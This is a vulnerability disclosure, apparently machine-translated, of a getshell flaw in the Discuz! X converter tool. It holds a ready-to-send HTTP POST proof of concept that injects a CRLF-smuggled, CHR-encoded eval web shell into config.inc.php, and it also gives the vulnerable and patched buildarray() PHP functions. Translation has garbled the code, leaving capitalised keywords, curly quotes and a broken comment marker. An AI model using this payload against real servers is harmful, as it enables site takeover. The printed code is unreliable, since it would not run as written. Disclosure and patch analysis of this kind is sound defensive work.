discuz! X upgrade/converter Getshell Vulnerability via/convert/include/global.func.php Inject special Symbol Into/convert/data /config.inc.php

Directory

Vulnerability description
2. Vulnerability trigger conditions
3. The scope of the vulnerability
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking 

1. Vulnerability description

For PHP applications, it is important to be in the user's input and correctly delimit the "data-code" boundary, which is used by hackers to inject "delimiters (format depending on the scene)" into the input data, which translates the input data into code that can be executed by the target system to achieve the purpose of code injection execution.
The root cause of this vulnerability is a newline (delimiter) in the code comment (input data) that causes code injection execution

Relevant Link:

http://p2j.cn/?p=357
http://loudong.360.cn/blog/view/id/15
http://www.2cto.com/Article/201402/278766.html
http://drops.wooyun.org/papers/929

2. Vulnerability Trigger Condition

1. /convert/include/global.func.php does not effectively filter the user's input data (non-numbers, letters, underscores cannot exist)
2. /convert/data/config.inc.php directory can be written 

0x1: How to use it manually

http://localhost/discuz/utility/convert/index.php

http://localhost/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0

You can set the properties of the data in the start settings, and the post data is written directly to the config.inc.php file.

0X2:POC Automated test methods

POST /DZ2/convert/ HTTP/1.1 Host: 192.168.52.129 Proxy-Connection: keep-alive
Content-Length: 925 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

a=config&source=d7.2_x2.0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw%5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3

Send this request directly Getshell, malicious code written to/convert/data/config.inc.php file

3. Vulnerability Impact Range

Full Discuz version

4. Vulnerability Code Analysis

\discuz\utility\convert\index.php

\discuz\utility\convert\include\do_config.inc.php

\discuz\utility\convert\include\global.func.php

Follow in this getvars () function

Function buildarray($array, $level = 0, $pre = ‘$_config‘)
{
    Static $ks;
    If($level == 0)
    {
        $ks = array();
        $return = ‘‘;
    }

    Foreach ($array as $key => $val)
    {
        If($level == 0)
        {
            $newline = str_pad(‘ CONFIG ‘.strtoupper($key).‘ ‘, 50, ‘-‘, STR_PAD_BOTH);
            /*
            Here is the key to generating vulnerabilities
            1. DISCUZ's original intention is to use the key of the $config array as the "comment title" for each configuration area.
            2. $newline written to the configuration file depends on $key, and $key is controllable by the attacker.
            3. The correct boundary processing is not performed on the input data, causing the attacker to insert a newline character into the input data, escaping the scope of the annotation, thereby converting the input data into executable code.
                1) Line breaks
                2) ?>
            This type of delimiter can achieve the same effect.
            */
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."[‘$key‘]";
        If(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."[‘$key‘]";
            $return .= buildarray($val, $level + 1, $pre);
        }
        Else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\' .addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."[‘$key‘]"." = $val;\r\n";
        }
    }
    Return $return;
}

5. Defense Methods

Function buildarray($array, $level = 0, $pre = ‘$_config‘)
{
    Static $ks;
    If($level == 0)
    {
        $ks = array();
        $return = ‘‘;
    }

    Foreach ($array as $key => $val)
    {
        / / Filter out non-letters, numbers and underscore characters in $key
        $key = preg_replace("/[^\w]/", "", $key);

        If($level == 0)
        {
            $newline = str_pad(‘ CONFIG ‘.strtoupper($key).‘ ‘, 50, ‘-‘, STR_PAD_BOTH);
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."[‘$key‘]";
        If(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."[‘$key‘]";
            $return .= buildarray($val, $level + 1, $pre);
        }
        Else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\' .addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."[‘$key‘]"." = $val;\r\n";
        }
    }
    Return $return;
} 

6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

discuz! X upgrade/converter Getshell Vulnerability via/convert/include/global.func.php Inject special Symbol Into/convert/data /config.inc.php